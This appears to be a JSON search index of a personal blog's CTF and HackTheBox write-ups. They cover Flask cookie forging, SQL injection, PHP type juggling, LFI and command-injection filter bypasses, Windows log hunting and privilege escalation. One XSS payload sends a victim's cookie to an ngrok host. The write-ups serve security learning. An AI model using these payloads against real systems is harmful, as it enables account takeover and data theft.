\u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}]
\ No newline at end of file